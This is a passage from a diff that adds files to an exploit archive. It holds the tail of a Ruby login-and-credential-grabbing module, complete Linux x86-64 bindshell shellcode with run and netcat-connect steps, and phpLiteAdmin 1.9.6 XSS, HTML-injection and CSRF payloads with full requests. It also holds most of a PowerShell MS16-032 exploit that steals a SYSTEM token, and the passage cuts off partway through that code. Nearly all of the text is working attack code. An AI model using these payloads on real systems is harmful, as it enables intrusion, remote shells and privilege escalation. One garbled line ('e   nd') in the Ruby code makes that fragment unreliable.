+    sid, last_login = get_login_data
+    if sid.empty? or last_login.empty?
+      print_error("#{peer} - Missing required login data.  Cannot continue.")
+      return
+    end
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    sid = auth(username, password, sid, last_login)
+    if not sid
+      print_error("#{peer} - Unable to login.  Cannot continue.")
+      return
+    else
+      print_good("#{peer} - Logged in as '#{username}:#{password}' Sid: '#{sid}' LastLogin '#{last_login}'")
+    e   nd
+    grab_auths(sid,last_login)
+  end
+end
\ No newline at end of file
diff --git a/platforms/lin_x86-64/shellcode/39718.c b/platforms/lin_x86-64/shellcode/39718.c
new file mode 100755
index 000000000..c457a561c
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39718.c
@@ -0,0 +1,88 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+  400080: 48 31 c0              xor    %rax,%rax
+  400083: 48 31 f6              xor    %rsi,%rsi
+  400086: 99                    cltd   
+  400087: 6a 29                 pushq  $0x29
+  400089: 58                    pop    %rax
+  40008a: ff c6                 inc    %esi
+  40008c: 6a 02                 pushq  $0x2
+  40008e: 5f                    pop    %rdi
+  40008f: 0f 05                 syscall 
+  400091: 48 97                 xchg   %rax,%rdi
+  400093: 6a 02                 pushq  $0x2
+  400095: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp)
+  40009c: 54                    push   %rsp
+  40009d: 5e                    pop    %rsi
+  40009e: 52                    push   %rdx
+  40009f: 6a 10                 pushq  $0x10
+  4000a1: 5a                    pop    %rdx
+  4000a2: 6a 31                 pushq  $0x31
+  4000a4: 58                    pop    %rax
+  4000a5: 0f 05                 syscall 
+  4000a7: 50                    push   %rax
+  4000a8: 5e                    pop    %rsi
+  4000a9: 6a 32                 pushq  $0x32
+  4000ab: 58                    pop    %rax
+  4000ac: 0f 05                 syscall 
+  4000ae: 6a 2b                 pushq  $0x2b
+  4000b0: 58                    pop    %rax
+  4000b1: 0f 05                 syscall 
+  4000b3: 48 97                 xchg   %rax,%rdi
+  4000b5: 6a 03                 pushq  $0x3
+  4000b7: 5e                    pop    %rsi
+  4000b8: ff ce                 dec    %esi
+  4000ba: b0 21                 mov    $0x21,%al
+  4000bc: 0f 05                 syscall 
+  4000be: 75 f8                 jne    0x4000b8
+  4000c0: 48 31 c0              xor    %rax,%rax
+  4000c3: 99                    cltd   
+  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
+  4000cb: 2f 73 68 
+  4000ce: 53                    push   %rbx
+  4000cf: 54                    push   %rsp
+  4000d0: 5f                    pop    %rdi
+  4000d1: 6a 3b                 pushq  $0x3b
+  4000d3: 58                    pop    %rax
+  4000d4: 0f 05                 syscall
+
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o bind_shell bind_shell.c
+$ execstack -s sh_shell
+$ ./sh_shell
+
+How to Connect
+
+$ nc <HOST IP ADDRESS> 5600
+
+Eg:
+
+$ nc 127.0.0.1 5600
+
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
+void main(int argc, char **argv)
+{
+	int (*func)();
+	func = (int (*)()) sh;
+	(int)(*func)();
+}
diff --git a/platforms/php/webapps/39714.txt b/platforms/php/webapps/39714.txt
new file mode 100755
index 000000000..feffe3186
--- /dev/null
+++ b/platforms/php/webapps/39714.txt
@@ -0,0 +1,767 @@
+#################################################################################################################################################
+# Exploit Title: phpLiteAdmin v1.9.6 - Multiple Vulnerabilities
+# Date: 20.04.2016
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://www.phpliteadmin.org
+# Software Link:
+https://bitbucket.org/phpliteadmin/public/downloads/phpLiteAdmin_v1-9-6.zip
+# Version: 1.9.6
+#################################################################################
+
+Introduction
+phpLiteAdmin is a web-based SQLite database admin tool written in PHP with
+support for SQLite3 and SQLite2. source = https://www.phpliteadmin.org
+
+
+Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS
+
+
+XSS details:
+#################################################################################
+
+XSS1
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+0_defaultoption
+
+PAYLOAD
+"><script>alert(1)</script>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
+
+tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined"><script>alert(1)</script>&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
+
+#################################################################################
+
+XSS2
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?view=import
+
+METHOD
+Post
+
+PARAMETER
+file
+
+PAYLOAD
+"><script>alert(2)</script>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
+
+Content-Type: multipart/form-data;
+boundary=---------------------------1675024292505
+Content-Length: 1124
+
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_type"
+
+sql
+-----------------------------1675024292505
+Content-Disposition: form-data; name="single_table"
+
+testtable
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldsterminated"
+
+;
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldsenclosed"
+
+"
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldsescaped"
+
+\
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_replacenull"
+
+NULL
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import_csv_fieldnames"
+
+on
+-----------------------------1675024292505
+Content-Disposition: form-data; name="file"; filename="test"
+Content-Type: text/plain
+
+"><script>alert(2)</script>
+-----------------------------1675024292505
+Content-Disposition: form-data; name="import"
+
+Import
+-----------------------------1675024292505--
+
+
+#################################################################################
+
+XSS3
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?view=sql
+
+METHOD
+Post
+
+PARAMETER
+queryval
+
+PAYLOAD
+"><script>alert(3)</script>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?view=sql HTTP/1.1
+
+queryval=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&delimiter=%3B&query=Go
+
+#################################################################################
+
+XSS4
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+select
+
+PAYLOAD
+"><script>alert(4)</script>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=view_create&confirm=1 HTTP/1.1
+
+viewname=test&select="><script>alert(4)</script>&createtable=Go
+
+#################################################################################
+
+XSS5
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+viewname
+
+PAYLOAD
+<script>alert(5)</script>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1 HTTP/1.1
+
+viewname=test<script>alert(5)</script>
+
+
+#################################################################################
+
+XSS6
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable
+
+METHOD
+Post
+
+PARAMETER
+numRows
+
+PAYLOAD
+'><script>alert(6)</script>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=row_view&table=testtable HTTP/1.1
+
+show=Show+%3A+&numRows=30%27%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&startRow=0&viewtype=table
+
+#################################################################################
+
+XSS7
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Cscript%3Ealert%287%29%3C/script%3E&pk=id
+
+METHOD
+Get
+
+PARAMETER
+action2
+
+PAYLOAD
+'><script>alert(7)</script>
+
+#################################################################################
+
+XSS8
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+tablename
+
+PAYLOAD
+%3cscript%3ealert(8)%3c%2fscript%3e
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
+
+tablename=testtable%3cscript%3ealert(8)%3c%2fscript%3e&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
+
+#################################################################################
+
+XSS9
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+oldname
+
+PAYLOAD
+<script>alert(9)</script>
+
+Request
+POST /phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1 HTTP/1.1
+
+oldname=testtable<script>alert(9)</script>&newname=test&rename=Rename
+
+#################################################################################
+
+
+HTML Injection details:
+#################################################################################
+
+HTML Injection1
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
+METHOD
+Post
+
+PARAMETER
+0_defaultoption
+
+PAYLOAD
+"><iframe src=https://www.phpliteadmin.org>
+
+#################################################################################
+
+HTML Injection2
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?view=import
+
+METHOD
+Post
+
+PARAMETER
+file
+
+PAYLOAD
+"><iframe src=https://www.phpliteadmin.org>
+
+#################################################################################
+
+HTML Injection3
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?view=sql
+
+METHOD
+Post
+
+PARAMETER
+queryval
+
+PAYLOAD
+"><iframe src=https://www.phpliteadmin.org>
+
+#################################################################################
+
+HTML Injection4
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+select
+
+PAYLOAD
+"><iframe src=https://www.phpliteadmin.org>
+
+#################################################################################
+
+HTML Injection5
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+viewname
+
+PAYLOAD
+<iframe src=https://www.phpliteadmin.org>
+
+#################################################################################
+
+HTML Injection6
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable
+
+METHOD
+Post
+
+PARAMETER
+numRows
+
+PAYLOAD
+'><iframe src=https://www.phpliteadmin.org>
+
+
+#################################################################################
+
+HTML Injection7
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Ciframe%20src=https://www.phpliteadmin.org%3E&pk=id
+
+METHOD
+Get
+
+PARAMETER
+action2
+
+PAYLOAD
+'><iframe src=https://www.phpliteadmin.org>
+
+#################################################################################
+
+HTML Injection8
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1
+
+METHOD
+Post
+
+PARAMETER
+oldname
+
+PAYLOAD
+<iframe src=https://www.phpliteadmin.org>
+
+#################################################################################
+
+
+CSRF details:
+
+#################################################################################
+
+CSRF1
+
+Create Database
+
+<html>
+<body>
+<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
+<input type="text" name="new_dbname" value="db"/>
+<input type="submit" value="Create DB"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF2
+
+Drop Database
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?database_delete=1"
+method="POST">
+<input type="text" name="database_delete" value=".\db"/>
+<input type="submit" value="Drop DB"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF3
+
+Execute SQL
+
+<html>
+<body>
+<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=sql"
+method="POST">
+<input type="text" name="queryval" value="test"/>
+<input type="text" name="delimiter" value=";"/>
+<input type="text" name="query" value="go"/>
+<input type="submit" value="Execute SQL"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF4
+
+Export DB
+
+<html>
+<body>
+<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=export"
+method="POST">
+<input type="text" name="tables[]" value="testtable"/>
+<input type="text" name="export_type" value="sql"/>
+<input type="text" name="structure" value="on"/>
+<input type="text" name="data" value="on"/>
+<input type="text" name="transaction" value="on"/>
+<input type="text" name="comments" value="on"/>
+<input type="text" name="export_csv_fieldsterminated" value=";"/>
+<input type="text" name="export_csv_fieldsenclosed" value="""/>
+<input type="text" name="export_csv_fieldsescaped" value="\"/>
+<input type="text" name="export_csv_replacenull" value="NULL"/>
+<input type="text" name="export_csv_fieldnames" value="on"/>
+<input type="text" name="filename" value="db_2016-04-20.dump"/>
+<input type="text" name="export" value="Export"/>
+<input type="submit" value="Export DB"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF5
+
+Download Database
+
+<html>
+<body>
+<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="GET">
+<input type="text" name="download" value=".\db"/>
+<input type="submit" value="Download DB"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF6
+
+Import Table
+
+URL
+http://localhost/phpliteadmin/phpliteadmin.php?view=import
+
+Request
+POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
+
+Content-Type: multipart/form-data;
+boundary=---------------------------28282942824983
+Content-Length: 1410
+
+-----------------------------28282942824983
+Content-Disposition: form-data; name="import_type"
+
+sql
+-----------------------------28282942824983
+Content-Disposition: form-data; name="import_csv_fieldsterminated"
+
+;
+-----------------------------28282942824983
+Content-Disposition: form-data; name="import_csv_fieldsenclosed"
+
+"
+-----------------------------28282942824983
+Content-Disposition: form-data; name="import_csv_fieldsescaped"
+
+\
+-----------------------------28282942824983
+Content-Disposition: form-data; name="import_csv_replacenull"
+
+NULL
+-----------------------------28282942824983
+Content-Disposition: form-data; name="import_csv_fieldnames"
+
+on
+-----------------------------28282942824983
+Content-Disposition: form-data; name="file";
+filename="db_2016-04-20.dump.sql"
+Content-Type: text/sql
+
+----
+-- phpLiteAdmin database dump (https://bitbucket.org/phpliteadmin/public)
+-- phpLiteAdmin version: 1.9.6
+-- Exported: 12:50am on April 20, 2016 (BST)
+-- database file: .\db
+----
+BEGIN TRANSACTION;
+
+----
+-- Table structure for testtable
+----
+CREATE TABLE 'testtable' ('id' INTEGER DEFAULT 1 );
+
+----
+-- Data dump for testtable, a total of 1 rows
+----
+INSERT INTO "testtable" ("id") VALUES ('1');
+COMMIT;
+
+-----------------------------28282942824983
+Content-Disposition: form-data; name="import"
+
+Import
+-----------------------------28282942824983--
+
+#################################################################################
+
+CSRF7
+
+Database Vacuum
+
+<html>
+<body>
+<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=vacuum"
+method="POST">
+<input type="text" name="vacuum" value="Vacuum"/>
+<input type="submit" value="DB Vacuum"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF8
+
+Database Rename
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?view=rename&database_rename=1"
+method="POST">
+<input type="text" name="oldname" value=".\db1"/>
+<input type="text" name="newname" value=".\db"/>
+<input type="text" name="rename" value="Rename"/>
+<input type="submit" value="DB Rename"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF9
+
+Create Table
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1"
+method="POST">
+<input type="text" name="tablename" value="testtable"/>
+<input type="text" name="rows" value="1"/>
+<input type="text" name="0_field" value="id"/>
+<input type="text" name="0_type" value="INTEGER"/>
+<input type="text" name="0_defaultoption" value="defined"/>
+<input type="text" name="0_defaultvalue" value="1"/>
+<input type="submit" value="Create Table"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF10
+
+Insert Table
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_create&confirm=1"
+
+
+method="POST">
+<input type="text" name="numRows" value="1"/>
+<input type="text" name="function_0_id" value=""/>
+<input type="text" name="0:id" value="1"/>
+<input type="text" name="fields" value="id"/>
+<input type="submit" value="Insert Table"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF11
+
+Row Delete
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_delete&confirm=1&pk=%5B
+
+%22%5B1%5D%22%5D" method="POST">
+<input type="submit" value="Row Delete"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF12
+
+Search Field
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=table_search&done=1"
+
+
+method="POST">
+<input type="text" name="id:operator" value="="/>
+<input type="text" name="id" value="1"/>
+<input type="submit" value="Search Field"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF13
+
+Rename Table
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1"
+method="POST">
+<input type="text" name="oldname" value="test"/>
+<input type="text" name="newname" value="testtable"/>
+<input type="text" name="rename" value="Rename"/>
+<input type="submit" value="Rename Table"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF14
+
+Empty Table
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_empty&confirm=1"
+method="POST">
+<input type="text" name="tablename" value="testtable"/>
+<input type="submit" value="Empty Table"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF15
+
+Drop Table
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?action=table_drop&confirm=1"
+method="POST">
+<input type="text" name="tablename" value="testtable"/>
+<input type="submit" value="Drop Table"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF16
+
+Create View
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1"
+method="POST">
+<input type="text" name="viewname" value="test"/>
+<input type="text" name="select" value="select * from testtable;"/>
+<input type="text" name="createtable" value="go"/>
+<input type="submit" value="Create View"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF17
+
+Drop View
+
+<html>
+<body>
+<form action="
+http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1"
+method="POST">
+<input type="text" name="viewname" value="test"/>
+<input type="submit" value="Drop View"/>
+</form>
+</body>
+</html>
+
+#################################################################################
+
+CSRF18
+
+Logout
+
+<html>
+<body>
+<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
+<input type="hidden" name="logout" value="Logout"/>
+<input type="submit" value="Logout"/>
+</form>
+</body>
+</html>
+
+#################################################################################
\ No newline at end of file
diff --git a/platforms/windows/local/39719.ps1 b/platforms/windows/local/39719.ps1
new file mode 100755
index 000000000..a7e26e702
--- /dev/null
+++ b/platforms/windows/local/39719.ps1
@@ -0,0 +1,372 @@
+function Invoke-MS16-032 {
+<#
+.SYNOPSIS
+    
+    PowerShell implementation of MS16-032. The exploit targets all vulnerable
+    operating systems that support PowerShell v2+. Credit for the discovery of
+    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
+    
+    Targets:
+    
+    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
+    * Tested on x32 Win7, x64 Win8, x64 2k12R2
+    
+    Notes:
+    
+    * In order for the race condition to succeed the machine must have 2+ CPU
+      cores. If testing in a VM just make sure to add a core if needed mkay.
+    * The exploit is pretty reliable, however ~1/6 times it will say it succeeded
+      but not spawn a shell. Not sure what the issue is but just re-run and profit!
+    * Want to know more about MS16-032 ==>
+      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
+.DESCRIPTION
+	Author: Ruben Boonen (@FuzzySec)
+	Blog: http://www.fuzzysecurity.com/
+	License: BSD 3-Clause
+	Required Dependencies: PowerShell v2+
+	Optional Dependencies: None
+	E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736
+    
+.EXAMPLE
+	C:\PS> Invoke-MS16-032
+#>
+	Add-Type -TypeDefinition @"
+	using System;
+	using System.Diagnostics;
+	using System.Runtime.InteropServices;
+	using System.Security.Principal;
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public int dwProcessId;
+		public int dwThreadId;
+	}
+	
+	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+	public struct STARTUPINFO
+	{
+		public Int32 cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public Int32 dwX;
+		public Int32 dwY;
+		public Int32 dwXSize;
+		public Int32 dwYSize;
+		public Int32 dwXCountChars;
+		public Int32 dwYCountChars;
+		public Int32 dwFillAttribute;
+		public Int32 dwFlags;
+		public Int16 wShowWindow;
+		public Int16 cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct SQOS
+	{
+		public int Length;
+		public int ImpersonationLevel;
+		public int ContextTrackingMode;
+		public bool EffectiveOnly;
+	}
+	
+	public static class Advapi32
+	{
+		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+		public static extern bool CreateProcessWithLogonW(
+			String userName,
+			String domain,
+			String password,
+			int logonFlags,
+			String applicationName,
+			String commandLine,
+			int creationFlags,
+			int environment,
+			String currentDirectory,
+			ref  STARTUPINFO startupInfo,
+			out PROCESS_INFORMATION processInformation);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool SetThreadToken(
+			ref IntPtr Thread,
+			IntPtr Token);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenThreadToken(
+			IntPtr ThreadHandle,
+			int DesiredAccess,
+			bool OpenAsSelf,
+			out IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenProcessToken(
+			IntPtr ProcessHandle, 
+			int DesiredAccess,
+			ref IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public extern static bool DuplicateToken(
+			IntPtr ExistingTokenHandle,
+			int SECURITY_IMPERSONATION_LEVEL,
+			ref IntPtr DuplicateTokenHandle);
+	}
+	
+	public static class Kernel32
+	{
+		[DllImport("kernel32.dll")]
+		public static extern uint GetLastError();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentProcess();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentThread();
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern int GetThreadId(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError = true)]
+		public static extern int GetProcessIdOfThread(IntPtr handle);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int SuspendThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int ResumeThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool TerminateProcess(
+			IntPtr hProcess,
+			uint uExitCode);
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool CloseHandle(IntPtr hObject);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool DuplicateHandle(
+			IntPtr hSourceProcessHandle,
+			IntPtr hSourceHandle,
+			IntPtr hTargetProcessHandle,
+			ref IntPtr lpTargetHandle,
+			int dwDesiredAccess,
+			bool bInheritHandle,
+			int dwOptions);
+	}
+	
+	public static class Ntdll
+	{
+		[DllImport("ntdll.dll", SetLastError=true)]
+		public static extern int NtImpersonateThread(
+			IntPtr ThreadHandle,
+			IntPtr ThreadToImpersonate,
+			ref SQOS SecurityQualityOfService);
+	}
+"@
+	
+	function Get-ThreadHandle {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+		
+		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+		$lpTargetHandle = [IntPtr]::Zero
+		$CallResult = [Kernel32]::DuplicateHandle(
+			$ProcessInfo.hProcess, 0x4,
+			[Kernel32]::GetCurrentProcess(),
+			[ref]$lpTargetHandle, 0, $false,
+			0x00000002)
+		
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		
+		$lpTargetHandle
+	}
+	
+	function Get-SystemToken {
+		echo "`n[?] Trying thread handle: $Thread"
+		echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
+	
+		$CallResult = [Kernel32]::SuspendThread($Thread)
+		if ($CallResult -ne 0) {
+			echo "[!] $Thread is a bad thread, moving on.."
+			Return
+		} echo "[+] Thread suspended"
+		
+		echo "[>] Wiping current impersonation token"
+		$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
+		if (!$CallResult) {
+			echo "[!] SetThreadToken failed, moving on.."
+			$CallResult = [Kernel32]::ResumeThread($Thread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[>] Building SYSTEM impersonation token"
+		# SecurityQualityOfService struct
+		$SQOS = New-Object SQOS
+		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+		# Undocumented API's, I like your style Microsoft ;)
+		$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
+		if ($CallResult -ne 0) {
+			echo "[!] NtImpersonateThread failed, moving on.."
+			$CallResult = [Kernel32]::ResumeThread($Thread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+	
+		$script:SysTokenHandle = [IntPtr]::Zero
+		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+		$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
+		if (!$CallResult) {
+			echo "[!] OpenThreadToken failed, moving on.."
+			$CallResult = [Kernel32]::ResumeThread($Thread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+		echo "[+] Resuming thread.."
+		$CallResult = [Kernel32]::ResumeThread($Thread)
+	}
+	
+	# main() <--- ;)
+	$ms16032 = @"
+	 __ __ ___ ___   ___     ___ ___ ___ 
+	|  V  |  _|_  | |  _|___|   |_  |_  |
+	|     |_  |_| |_| . |___| | |_  |  _|
+	|_|_|_|___|_____|___|   |___|___|___|
+	                                    
+	               [by b33f -> @FuzzySec]
+"@
+	
+	$ms16032
+	
+	# Check logical processor count, race condition requires 2+
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	# Create array for Threads & TID's
+	$ThreadArray = @()
+	$TidArray = @()
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handles.."
+	# Loop Get-ThreadHandle and collect thread handles with a valid TID
+	for ($i=0; $i -lt 500; $i++) {
+		$hThread = Get-ThreadHandle
+		$hThreadID = [Kernel32]::GetThreadId($hThread)
+		# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
+		if ($TidArray -notcontains $hThreadID) {
+			$TidArray += $hThreadID
+			if ($hThread -ne 0) {
+				$ThreadArray += $hThread # This is what we need!
+			}
+		}
+	}
+	
+	if ($($ThreadArray.length) -eq 0) {
+		echo "[!] No valid thread handles were captured, exiting!"
+		Return
+	} else {
+		echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
+		echo "`n[?] Thread handle list:"
+		$ThreadArray
+	}
+	
+	echo "`n[*] Sniffing out privileged impersonation token.."
+	foreach ($Thread in $ThreadArray){
+	
+		# Get handle to SYSTEM access token
+		Get-SystemToken
+		
